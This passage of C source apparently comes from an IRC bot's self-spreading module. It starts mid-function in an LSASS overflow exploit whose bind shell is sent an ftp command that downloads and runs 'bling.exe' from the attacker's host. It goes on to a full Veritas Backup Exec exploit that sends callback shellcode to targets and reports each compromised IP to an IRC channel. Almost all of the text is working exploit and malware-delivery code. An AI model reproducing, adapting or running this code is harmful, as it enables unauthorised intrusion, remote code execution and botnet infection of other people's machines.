memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);
if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
} else {
memcpy(screq, reqx7, sizeof(reqx7)-1);
memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);
screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
memset(&bsin, 0, sizeof(bsin));
bsin.sin_family = AF_INET;
bsin.sin_port = fhtons(LSASS_BSPORT);
bsin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
Sleep(500);
_snprintf(cmd_buff, sizeof(cmd_buff),
// "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
fclosesocket(sSocket);
fclosesocket(bSocket);
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent)
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
} else
return FALSE;
}
BOOL VertiasBackupExec( EXINFO exinfo, VertiasBackupExec_Version eVersion )
{
char *pszVerString;
// ---
int nShellSize;
char szShellBuf[ 512 ];
// ---
SOCKET nFDSocket;
sockaddr_in ServerAddr;
// ---
int nCounter;
// prepare version depending data
if( eVersion == Backup_Exec_v9_1_4691_SP1_SP0 )
{
memcpy( &talk[ 37 ], &v91sp0sp1, 4 );
memcpy( &talk[ 72 ], &esisp0sp1, 4 );
pszVerString = "v9.1.4691.0+1";
}
else if( eVersion == Backup_Exec_v8_5_3572 )
{
memcpy( &talk[ 37 ], &v85, 4 );
memcpy( &talk[ 72 ], &esiold, 4 );
pszVerString = "v8.5.3572";
}
else
return FALSE;
// get shellcode
nShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
if( !nShellSize )
return FALSE;
// create socket
nFDSocket = fsocket( AF_INET, SOCK_STREAM, IPPROTO_IP );
if( nFDSocket == INVALID_SOCKET )
return FALSE;
// connect to it
memset( &ServerAddr, 0, sizeof( ServerAddr ) );
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = fhtons( exinfo.port );
ServerAddr.sin_addr.s_addr = finet_addr( exinfo.ip );
if( fconnect( nFDSocket, (sockaddr*)&ServerAddr, sizeof( ServerAddr ) ) == SOCKET_ERROR )
{
fclosesocket( nFDSocket );
return FALSE;
}
// send talk
if( fsend( nFDSocket, talk, sizeof( talk ) - 1, 0 ) == SOCKET_ERROR )
{
fclosesocket( nFDSocket );
return FALSE;
}
Sleep( 10 );
// send payload(s)
for( nCounter = 0; nCounter < 7; nCounter++ )
{
if( fsend( nFDSocket, szShellBuf, strlen( szShellBuf ), 0 ) == SOCKET_ERROR )
{
fclosesocket( nFDSocket );
return FALSE;
}
Sleep( 10 );
}
Sleep( 1000 );
fclosesocket( nFDSocket );
// MESSAGE(S)
char buffer[ IRCLINE ];
_snprintf(buffer, sizeof(buffer), "[%s (%s)]: Exploiting IP: %s.", exploit[exinfo.exploit].name, pszVerString, exinfo.ip);
if (!exinfo.silent)
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
